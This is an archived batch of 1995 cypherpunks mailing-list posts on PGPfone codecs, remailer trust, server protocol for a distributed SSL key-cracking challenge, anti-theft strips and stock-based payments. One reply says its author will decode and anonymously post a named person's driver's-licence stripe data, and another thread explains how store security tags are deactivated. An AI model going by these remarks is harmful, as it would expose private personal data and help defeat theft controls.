> demagnetize the security strips?

Better would be to figure out the encoding scheme and post it here.
Anonymously to be sure







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 27 Aug 95 13:15:11 PDT
To: Thomas Grant Edwards <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
Message-ID: <v02120d05ac6690b0fb58@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:38 8/27/95, Thomas Grant Edwards wrote:
>On Sun, 27 Aug 1995, Tatu Ylonen wrote:
>
>> Maybe someone could start writing an internet draft about "encrypted
>> voice transmission on the internet".  It should address several
>> issues:
>>   - compression methods, sampling rate differencies, encoding methods
>
>BTW - does anyone actually know what the voice compression is in
>PGPfone?

GSM lite and I think CELP. PGPFone has some serious problems with the
variable latencies of real life connections. These problems will not go
away until PGPFone makes the shift to APIs that are designed to deal with
such problems, such as QuickTime conferencing. I hope PRZ will realize
this.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: henri@netcom.com (henry)
Date: Sun, 27 Aug 95 06:34:38 PDT
Subject: this is getting silly (was Re: C2.ORG REMAILER)
In-Reply-To: <41gsan$elo@utopia.hacktic.nl>
Message-ID: <henriDDz17L.H37@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <vxFQws0p3fRe084yn@walli.uwasa.fi>,
Jukka Santala <jsantala@walli.uwasa.fi> wrote:
>In scroll <41jnqn$qgm@nntp.crl.com>, Nobody wrote:
>> sameer@soda.CSUA.Berkeley.EDU (Sameer Parekh) wrote:
>>> Community COnneXion will not reveal the identity of non-anonymous
>>> account holders without a court order or explicit permission from
>>> the account holder.
>> Sameer - You caved WAAAY too easily - I will suggest that we ban ALL
>> inclusion of your reamiler in any chain, due to the fact tha your
>> c2.org CAN NOT be trusted to resist pressure.  See ya on the c-punks
>> area.

this is bogus.  i'll explain why.

>Now, Nobody, that is chickenshit if anything, and I "suggest" you
>know it.  The actions taken by Community ConneXion in no way prove
>that it would be any less trustable in this matter than any other
>remailer in the world.  In fact, certain coolheadedness to all
>parties present is, in my opinion, one of the main requirements of
>respectable remailer.  In fact, had c2.org been pinned down for the
>copyright infrigment with no ability to point the real infriger, CoS
>could well have stood a change to get hold of any possible remailer
>logs.

i seriously doubt that sameer keeps logs, as i believe he runs
a cypherpunks remailer.  furthermore, regardless of how anyone
feels about the state of sameer's courage, attacking his integrity
is utterly ridiculous.  he hasn't given out anyone's userid, 
nobody's anonymity has been compromised, and to suggest that
because you don't like his decision in this matter that he's
going to go around coughing up userids and personal identities
is completely ridiculous.  ridiculous beyond belief.

i agree with jukka.  sameer's given us no reason not to trust
him, even if he's given us a bit of attitude.  i'd probably
have responded in about the same way if i were suddenly dragged
into what you have to admit is an extremely convoluted and 
bizarre netwar with an alarming tendency to get people's 
computers confiscated and homes attacked.

h
- --
              Xenu's Famous House o' Clams T-shirts!
 *All* profits go to MoFo to help with the Dennis Erlich Defense Fund.
            Email to:  ladyada@gnu.ai.mit.edu for details
            $15 per shirt, 3 colors.  Design available at 
        http://www.cybercom.net/~rnewman/scientology/home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQBVAgUBMEBxw3Z/m2/Pgo35AQHpkwH8DO752jxoMFwG6fCLsI7vZGMV/hxX4H/U
K1PWw5XZQanIeSMytdML5lbok5iwWWoD2xMwnWBSjvgSRyxmuNkLyQ==
=tTgw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 27 Aug 95 18:52:16 PDT
To: cypherpunks@toad.com
Subject: SSL ACKs vs. Anonymity (was Re: SSL trouble)
In-Reply-To: <199508271848.LAA18104@Csli.Stanford.EDU>
Message-ID: <199508271943.PAA16219@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Having ACKs from the people cracking your SSL exchange is fun; it
provides feedback on whether your code is working, allows the
volunteers to see their name in lights, and gives you this nice warm
feeling that progress is being made. In server-allocation schemes, it
also provides an optimization: no need to hand out chunks that have
been ACKed.

Not having ACKs provides anonymity to those who are performing the
crack. The only two agents who have issues of anonymity to consider
are: the one presenting the challenge (and its prize), and the one
that gets the solution (and its prize).

Perhaps anonymity is unimportant for toy problems: so far, Hal has not
complained that Agent 86's CCNs have been spread all over the Net. I
can imagine a "real" challenge being a much more serious affair. Do
you really want to be caught talking with www.brute.cam.cl.ac.uk for
two days straight just before someone posts Louis Freeh's American
Express number to alt.credit-cards.exploit?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsantala@walli.uwasa.fi (Jukka Santala)
Date: Sun, 27 Aug 95 04:44:33 PDT
Subject: Re: C2.ORG REMAILER
In-Reply-To: <41gsan$elo@utopia.hacktic.nl>
Message-ID: <vxFQws0p3fRe084yn@walli.uwasa.fi>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In scroll <41jnqn$qgm@nntp.crl.com>, Nobody wrote:
> sameer@soda.CSUA.Berkeley.EDU (Sameer Parekh) wrote:
>> Community COnneXion will not reveal the identity of non-anonymous
>> account holders without a court order or explicit permission from
>> the account holder.
> Sameer - You caved WAAAY too easily - I will suggest that we ban ALL
> inclusion of your reamiler in any chain, due to the fact tha your
> c2.org CAN NOT be trusted to resist pressure.  See ya on the c-punks
> area.

Now, Nobody, that is chickenshit if anything, and I "suggest" you
know it.  The actions taken by Community ConneXion in no way prove
that it would be any less trustable in this matter than any other
remailer in the world.  In fact, certain coolheadedness to all
parties present is, in my opinion, one of the main requirements of
respectable remailer.  In fact, had c2.org been pinned down for the
copyright infrigment with no ability to point the real infriger, CoS
could well have stood a change to get hold of any possible remailer
logs.

Just like in the anon.penet.fi case, where Helsingius gave out the
entries identifying the account in question instead of holding them
back at the risk of getting all the entries confiscated.  It's
called picking the lesser evil.  In fact, the only effect you stand
to gain from accusing people of such acts is perhaps making them
that much more inclined to really co-operate with your enemy next
time they ask for it.

Furthermore, altough Sameer could've been pretty sure of even
monetary support from the 'net community in his battles against CoS,
I personally think such would only be waste of resources.  The
copyrights of OT materials will be found out in Erlich's case,
posting them publicly in Lerma's case and the common provider status
of ISP's will be tested in Netcom's case.  In my opinion, we stand
nothing to gain, only lose, from increasing the number of cases
further.  Not to even mention that the Fishman documents have now
been temporarily sealed, which further clouds the issue.

Finally, I hope you do know that the reason of actually using
remailer-chains is the admittance that some of them might be
compromised.  The idea behind remailer chains is that each and every
one of the mailers in the chain needs first to be identified and
then compromised to successfully find out the real poster.
"Banning" it out of the remailer chains, even if possible, would
serve no purpose.  Posting the facts and letting people make their
own decisions based on those could, perhaps, be warranted.

  Regards,
    Donwulff

Intergalactic terrorist and arms dealer, squire for Knights of Xenu.
Operation Entheta National Command, captain Donwulff of Discordia.
Tell your people.  alt.religion.scientology   Let The World Know!
           -><- Hail Eris! All hail Discordia! -><-

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEBkayrmAC3+VL2ZAQEw3AQAvq5NKAExecLJ1/GKpSfO10w8Y/H/1cpi
AJAGc2JikWfPVvhxaw1b1Ib3TiX4IyvMHXu2YIldDUcWnCYq/Yx2iAnbeo08r7Uq
y7sgDjghyuMBX9EXtaVN4uiRSc+ESDM/oTQGc6atFbtqrSmoKlyO/jHWp/A76pL/
SIYVGLU+kV8=
=DQ3K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 14:43:44 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508270121.EAA24196@shadows.cs.hut.fi>
Message-ID: <199508272143.OAA19782@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Note that most of the MBone tools already has encrypted sessions
built in them, and have had that for at least a year, and that the
MICE project in Europe has tried to put encryption into the last ones.

There is also a lot of standardization efforts going on within the
IETF community, for example within the MMUSIC group, chaired by
Mark Handley from UCL, London <M.Handley@cs.ucl.ac.uk>. They are
standardizing the session control protocol, for example, using one
called CCCP. They are also concerned about security, thats for sure.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sun, 27 Aug 95 12:39:01 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508270121.EAA24196@shadows.cs.hut.fi>
Message-ID: <Pine.SUN.3.91.950827153801.29699A-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995, Tatu Ylonen wrote:

> Maybe someone could start writing an internet draft about "encrypted
> voice transmission on the internet".  It should address several
> issues:
>   - compression methods, sampling rate differencies, encoding methods

BTW - does anyone actually know what the voice compression is in 
PGPfone?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sun, 27 Aug 95 12:40:34 PDT
To: Tobin T Fricke <dr261@cleveland.Freenet.Edu>
Subject: Re: proliferations of voicesystems
In-Reply-To: <199508270234.WAA07065@kanga.INS.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.950827153918.29699B-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Tobin T Fricke wrote:

> I'd have to agree with you (Ray) completely about the need for
> standards for the voice internet communications software. 

There is a standards track for real-time audio and video communications.  
Seems to me the hard part is defining codecs, the easy part is dropping 
in crypto.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Sun, 27 Aug 95 20:55:24 PDT
Subject: Re: Thanks for all your efforts ... you can stop now ...
In-Reply-To: <Pine.SUN.3.91.950826130755.29279A-100000@pipa.src.umd.edu>
Message-ID: <Pine.3.89.9508272250.A957-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Thomas Grant Edwards wrote:

> I hope this will not be the end of our distributed brute-forcing runs, 
> but only the beginning!  We should be able to take what we have learned 
> from this run and put together an even smoother run for the next challenge.
> 

Can someone please summarize the experience for those of us whom were on 
vacation during the trial so we can learn in an abridged way?  What 
problems ensued (the bottlenecks, etc.) and what solutions were thought 
up?  Thanks.


> -Thomas
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sun, 27 Aug 95 13:44:56 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508272017.NAA06661@jobe.shell.portal.com>
Message-ID: <Pine.BSD.3.91.950827154138.22436A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995 anonymous-remailer@shell.portal.com wrote:
> 
> Better would be to figure out the encoding scheme and post it here.
> Anonymously to be sure

Thanks, I'll remember to do that to MN's license.
Anyone know of stripereaders in the state?

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 15:52:56 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508270432.AAA20728@interport.net>
Message-ID: <199508272252.PAA20854@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| >   One small point, cryptanalysis equipment is also covered by
| > ITAR restrictions.
| 
|   What is the significance of this rather ominous warning?

And I guess they would consider even brute-forcing code to be 
cryptoanalysis? But not the actual netscape binaries, since they
are for "proper" use. :-(

Sigh. I'm getting tired of all this.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Sun, 27 Aug 95 13:41:18 PDT
To: cypherpunks@toad.com
Subject: Re: Demagnetizing
Message-ID: <199508272050.PAA05379@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>Reply-To: dr261@cleveland.Freenet.Edu (Tobin T Fricke)

>
>Where exactly is the r/c circuit?  Is it very small and in
>a label?  Book publishers don't put them in, do they?  
>Also, if the thing gets "burned out" by the magnet in the
>pad, what do libraries and such do where materials are
>reused?  Just slap on another label thing?  
>
It's much more low-tech than that.  Libraries and book stores just
put a strip of magnetized material (it's much like audio tape,
about 1/8 inch wide and comes on rolls) inside the book and then
put detectors at the doorway.  It the detector feels a magnetic field,
it buzzes; if the tape has been deguassed, nothing happens.

For libraries, it's usually mounted on sticky tape and put down
inside the book spine.  Bookstores usually just snip off a 4 - 5"
segment and slip it inside the book.  Music stores frequently tape
a small section on the outside of CD jewel boxes.

Sorry, there's no real mystery or exciting tech here.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sun, 27 Aug 95 14:01:11 PDT
To: Tobin T Fricke <cypherpunks@toad.com
Subject: Re: proliferations of voicesystems
In-Reply-To: <Pine.SUN.3.91.950827153918.29699B-100000@pipa.src.umd.edu>
Message-ID: <Pine.SUN.3.91.950827163727.29741D-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995, Thomas Grant Edwards wrote:

> There is a standards track for real-time audio and video communications.  
> Seems to me the hard part is defining codecs, the easy part is dropping 
> in crypto.

See ftp://gaia.cs.umass.edu/pub/hgschulz/rtp/draft-ietf-avt-rtp-06.txt
for more information on the RTP standard.

See ftp://gaia.cs.umass.edu/pub/hgschulz/rtp/draft-ietf-avt-profile-04.txt
for the use of RTP in video and audio conferencing.  This draft 
recommends the following audio encodings:

  name nom.  sampling  rate type frame description
                    Hz  kb/s S/F  ms
 _________________________________________________________________________
  L8            11025  88.2 S           8-bit linear, offset
  L16           48000   768 S           16-bit linear, 2's complement
  L16           44100 705.6 S
  L16           22050 352.8 S
  L16           11025 176.4 S
  G722          16000    64 S           CCITT/ITU-T subband ADPCM
  PCMU           8000    64 S           CCITT/ITU-T mu-law PCM
  PCMA           8000    64 S           CCITT/ITU-T A-law PCM
  G721           8000    32 S           CCITT/ITU-T ADPCM
  IDVI           8000    32 S           Intel/DVI ADPCM [IMA]
  IDVI          16000    64 S           Intel/DVI ADPCM [IMA]
  G723           8000    24 S           CCITT/ITU-T ADPCM
  GSM            8000    13 F    20    RTE/LTP GSM 06.10
  1016           8000   4.8 F    30    CELP
 _________________________________________________________________________

Some of these seem perfectly appropriate for 28.8 kbps transmission, even 
with the overhead of a PPP dialup connection.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 17:42:04 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Server congestion
Message-ID: <199508280041.RAA22255@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



I talked about acks of acks in a previous message, and I guess is was
somewhat vague there.

What happened, according to my uninformed view, during the SSL2
challenge was that the server got congested, and had problems with
both answering to key allocation requests and ack replies. I guess 
that the load of the machine was so high that it lost packets in the
input queues.

Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> Server ---+
                                                     | alloc
Client <------- UDP/allocation reply ----------------+
  |
  | working...
  | 
Client ------- UDP/ack ------------------> ??

One problem was that the client believed that the ACK had arrived
at the server if it had sent it off, not counting with the possibility
of the ACK being lost on the way.

I instead propose that the Server sends a acknowledgement
back to the client once it has received an ACK from a client.

  | working...
  | 
Client ------- UDP/ack ------------------> Server -+
                                                   |
Client <------ UDP/Server-ack ------------ Server -+

And then the client knows the server actually received the ACK
and has incorporated it into its table.

The client has to handle the case that either the Ack or the
Server-ack is lost. I propose it doesn't retransmit immediately,
but rather waits until next time it has to ack something, and 
piggybacks the old ack onto the new one.

Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> Server ---+
                                                     | alloc
Client <------- UDP/allocation reply ----------------+
  |
  | working...
  | 
Client ------- UDP/ack1 ------------------> ??
  | 
"oops, oh well, lets try later."
  |
Client -----> UDP/Key allocation req ----> Server ---+
                                                     | alloc
Client <------- UDP/allocation reply ----------------+
  |
  | working...
  | 
Client ------- UDP/ack2/ack1 ------------> Server -+
                                                   |
Client <------ UDP/Server-ack {1,2} ------ Server -+
  | 

There are countermeasures if either part doesn't get messages for some
reason. 

If the server doesn't see the ACK for a block, it might give that
block out to someone else.

If the client is unable to retrieve a block from the server, I suggest
it just picks a random block and starts working on it. I may very
well not be allocated to someone else, and then the client was able
to do something good in the meantime even though it didn't get a
proper key alloc. 

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 27 Aug 95 15:00:34 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: proliferation of voicesystems
In-Reply-To: <v02120d05ac6690b0fb58@[192.0.2.1]>
Message-ID: <199508272159.RAA00299@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
> >BTW - does anyone actually know what the voice compression is in
> >PGPfone?
> 
> GSM lite and I think CELP. PGPFone has some serious problems with the
> variable latencies of real life connections. These problems will not go
> away until PGPFone makes the shift to APIs that are designed to deal with
> such problems, such as QuickTime conferencing. I hope PRZ will realize
> this.

  And Windows95/NT has a Audio Compression Manager which comes with
GSM and TrueSpeech compression drivers. 

  The problem is, what will be done for the Unix users? A standard
audio API is sorely missing in the unix world (NetWork Audio 
System and AudioFile aren't solutions)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard <midnight@rio.atlantic.net>
Date: Sun, 27 Aug 95 15:30:01 PDT
To: Man In Black <mib@davinci.netaxis.com>
Subject: Re: Demagnetizing
In-Reply-To: <Pine.SOL.3.91.950827041448.24279A-100000@davinci.netaxis.com>
Message-ID: <Pine.LNX.3.91.950827182517.5467A-100000@rio.atlantic.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 27 Aug 1995, Man In Black wrote:

> On Sun, 27 Aug 1995, Tobin T Fricke wrote:
> 
> > How exactly does that system work?  They can't instantly 
> > demagnetize something with a quick tap on a pad, can they? Also,
> > what are they demagnetizing?  Is it a strip embedded in the spine
> > of the book, or is it just in a sticker on the outside? For
> > instance, how do they do it to magazines (or do they? they
> > go through the process with magazines, too, or is that just
> > because they don't know better?)?
> 
> The way the system works at my local library is that there _is_ a strip 
> embedded in the spine and it isn't demagnetized by a quick tap by rubbing 
> it several times over a demagnetizer (there's a big sticker on the side 
> that says not to leave any magnetic storage media near it).   As far as 
> magazines go, my library simply doesn't let people borrow them (which 
> means if it ain't there, it's stolen).  Anyone know how they protect 
> against magazine theft (okay, no crypto relevance.  reply to me and not 
> the list, then).  Later.
> 

Okay.

The strips that you see in books and on those fake UPC stickers on 
merchandise are NOT magnetic.  They are simply antennas that are tuned
to a particular frequency.

What happens is that when you go near one of the readers/recievers, an 
elecromagnetic (RF) wave is transmitted.  The antenna/sticker is tuned to
this particular frequency and resonates with it.  The result is that there
is a RE-RADIATION of that particular wave and the receiver detects that
out-of-phase retransmitted wave and sets of the alarm.

The deactivator simply raditates a stronger wave (tuned to the same 
frequency) that burns a small fuse on the sticker and changes the length
of the antenna and hence its resonant frequency.

I'm not sure how the book strips work but they are similar.  There has
to be a mechanism in there for resetting some sort of small microelectric
circuit that can be reset and change the length of the antenna.

-Richard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 27 Aug 95 12:21:34 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: SSL trouble
In-Reply-To: <199508271848.LAA18104@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:079000:950827192056"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> And there is the third alternative, hierarchical search, which
> distributes the task of giving out keys. This is admittedly a
> little bit more involved, of course. The SKSP had provisions for
> doing it hierarchically, as far as I understood it, although
> I might be wrong.

Indeed, it does, and we plan to provide a "local CPU farm" server
which can be used when a number of machine are sharing the same ID.

> What I wonder is wheter the server congestion really showed that
> the protocol is flawed.

No -- but that the early version of the code were buggy.

As it is, 6 clients which are still running are managing to keep the
server permanently busy.

I think the protocol itself is OKish ..

> Handing out bigger blocks relieved the  situation.

Not really.

It did however mean that when a chunk was allocated, three times as
much work was done !


> 1. The server knows approximately how many requests per second it 
> can take, and tells the clients this information.

Hmm -- hard to tell -- the *server* can take lots, but if the
*clients* have problems, things go wrong.

A select/poll server is not going to be tried on the next one -- that'll only
be used if that goes slow as well ...

> 2. The client initially does a testrun, and determines how fast it 
> runs.

The latest version of brloop starts with a call of "brutessl -q -t 1"
to decide how big the chunks should be ...

> 3. Each client is handed a block that, given the approximate number
> of currently pending and active blocks out there, together with the
> calculation time of the client, will give an acceptable number of 
> requests/time unit to the server.

I suspect that figures would be too crude ...
The server would have to keep track of clients and how long their
sessions take ....
Should a client which takes 20s for a session be given blocks that take
20 times longer to process than one which manages it in 1s ?

> 4. The server acks (S-ACK) the block-ack to the client.

Sorry -- what does that mean ?

> If the client doesn't get an ack (S-ACK) from the server for its ack (B-ACK),
> it keeps the ack around til the next block is calculated, and sends this 
> ack together with the new acks.

Sorry -- I'm lost ...

> 5. The server can hand out allocated blocks to others, for those
> blocks that has not been acked in three times the estimated
> calculation time. 

I've split allocation from ACKs.
One server just doles out keys, the other just collects the ACKs.
I don't want to add that sort of realtime feedback.

What do you do about WWW clients ?

What if someone grabe a big chunk, farms it out to several machines,
and they ACK bits back ... ?


> 6. If a client is unable to get a key allocation after a number of 
> tries, it can chose a random block and search that. It can then be
> acked to the server. This may result in overlapping blocks, but this
> should not pose such a big problem, since most of the key space is
> searched in an orderly manner anyway.

Again no realtime fedback from ACKs :-(

> It would be very interesting if detailed statistics or the logfile
> of the server could be published somewhere. How many machines were
> involved? etc...

That'll come -- as the WWW pags says. pelase let me know what stats you'd like.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 27 Aug 95 18:20:52 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508272159.RAA00299@clark.net>
Message-ID: <199508280120.VAA20942@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   The problem is, what will be done for the Unix users? A standard
> audio API is sorely missing in the unix world (NetWork Audio 
> System and AudioFile aren't solutions)

It depends on what you mean by an API. If you are just talking about
driver interfacing there are de facto standards at this point --
basically everyone has been adopting the sun /dev/audio ioctls. 

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Sun, 27 Aug 95 20:33:19 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <199508280328.AA18864@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Wed, 23 Aug 1995 23:30:27 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: e$: The Book-Entry/Certificate Distinction
> 
> At 4:10 AM 8/24/95, Alan Penny wrote:
> >The other night I heard that some of the rules for selling stock have
> >been changed to allow companies to sell stock directly to investors.
> >I have been thinking that this may have the potential to support an
> >interesting system.
> 
> My company sold stock to me directly, through a Stock Participation Plan
> and an Incentive Stock Option Plan.

I think that the point of the news report was that in the past companies
were limited in the type of investor they could sell to (e.g., employee,
stock-broker). I assume what they meant by the report was that a company
under the new rules could sell stock to anyone who asked.

> 
> >Imagine "Portfolio Accounts" with a debit-card like access method.
> 
> I use a debit card which directly accesses my stock account. More on this
> in a moment.
> 
> >Instead of paying for an item at a store with money or credit you use
> >your Portfolio-Account card and buy the item with shares/micro-shares
> >of stock. Stock brokers may offer this type of service in response the
> >competition of companies bypassing them. Stock brokers could setup
> >services that mediate between transactions calculating trades and values
> >"on-the-fly" (anonymity could be tricky to build into this system).
> 
> This is where it breaks down. Stock prices are denominated in dollars (or
> the local currency, as applicable). And local purchases are denominated in
> dollars. Nobody pays "one microMicrosoft" for a loaf of bread. They pay $1.
> And Microsoft stock sells for $100, not 100 loaves of bread.

Prices could still be denominated in dollars, but the actual transaction
could be executed with stock value (at the current market price). There
would be an element of risk in these transactions since after the
transaction a stock's value might go down, but it might also go up as
well. I would think that if a merchant had a large volume of
transactions and a varied stock "intake" a merchants portfolio would
tend to balance out in terms of stock increases and decreases.

>
> >If the company you worked for paid you with stock instead of money this
> >would complete the loop.
> 
> The IRS and other tax authorities have this one figured out: barter
> economies are not generally a way to avoid taxes.
>

Oh well, you win some and you loose some :-)

> >This also has the interesting feature of avoiding all taxes. Until you
> >"cash out" your account you would not have to pay taxes, if you never
> >need cash out your account, you never need to pay taxes. I suspect that
> >our friendly governments would try to "correct" this "problem" in the
> >long run if they can.
> 
> If you are paid in barter for some service, taxes are still owed, based on
> the estimated value of services rendered.
> 
> By the way, a simpler example than all this talk of partial shares of
> companies is simply to talk about paying each other in gold, or oil, or any
> other commodities.

Hmmm, a "micro-spot" commodity market?

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 27 Aug 95 19:44:17 PDT
To: perry@piermont.com
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508280120.VAA20942@frankenstein.piermont.com>
Message-ID: <199508280244.WAA12743@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Ray Cromwell writes:
> >   The problem is, what will be done for the Unix users? A standard
> > audio API is sorely missing in the unix world (NetWork Audio 
> > System and AudioFile aren't solutions)
> 
> It depends on what you mean by an API. If you are just talking about
> driver interfacing there are de facto standards at this point --
> basically everyone has been adopting the sun /dev/audio ioctls. 

  That's too low-level to deal with the proliferation of PC sound systems,
especially since even non-intel workstations are adopting PCi buses.
If I recall, /dev/audio relies on u-law/a-law encoding. That's only one
component of a higher level audio system. That's like having a
/dev/svga but no Motif library. Furthermore, a /dev/audio like
interface doesn't admit good hardware acceleration, such as if you
had to play an MPEG layerIII audio, but your sound card had a DSP.

-Ray

  

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sun, 27 Aug 95 19:50:19 PDT
To: cypherpunks@toad.com
Subject: Re: nym server development mailing list
Message-ID: <199508280250.WAA09233@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



>John created a mailing list for those interesting in contributing to the
>development of his nymserver and as a forum for discussion of nymserver
>related issues.  So far, there have been few folks subscribed, and no
>answer from those that are presently subscribed to the list.  I find
>this rather disappointing.

This sounds very interesting and on topic for the list. If it is such low
volume why not talk about it here and then if it gets to be too much volume
move it to a separate list? You may generate more interest that way and keep
more people informed.

Steven
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 27 Aug 95 14:53:57 PDT
To: Matt Miszewski <crypto@midex.com>
Subject: Re: Thanks for all your efforts ... you can stop now ...
In-Reply-To: <Pine.3.89.9508272250.A957-0100000@shaq.midex.com>
Message-ID: <"swan.cl.cam.:122740:950827215255"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Can someone please summarize the experience for those of us whom were on 
> vacation during the trial so we can learn in an abridged way?  What 
> problems ensued (the bottlenecks, etc.) and what solutions were thought 
> up?  Thanks.

See http://www.brute.cl.cam.ac.uk/brute/ for a view from the centre ...
Any other experiences welcomed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Mon, 28 Aug 95 00:18:29 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Announcing SecureDrive 2.4
Message-ID: <Lw5iaD5w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is to announce the availability of Version 1.4 of SecureDrive.

SecureDrive Version 1.4 replaces version 1.3d and previous versions.

Changes for 1.4 have added significant new function.

New features include ability to use a keyfile either instead of or
in addition to a passphrase, the /ADD function and the option to
specify a drive letter, which is remembered, when specifying manual
partition parameters to LOGIN.

/ADD allows you to LOGIN multiple hard disk partitions (with the
same key) at the same time.

The subroutine which "finds" a physical hard disk partition based on
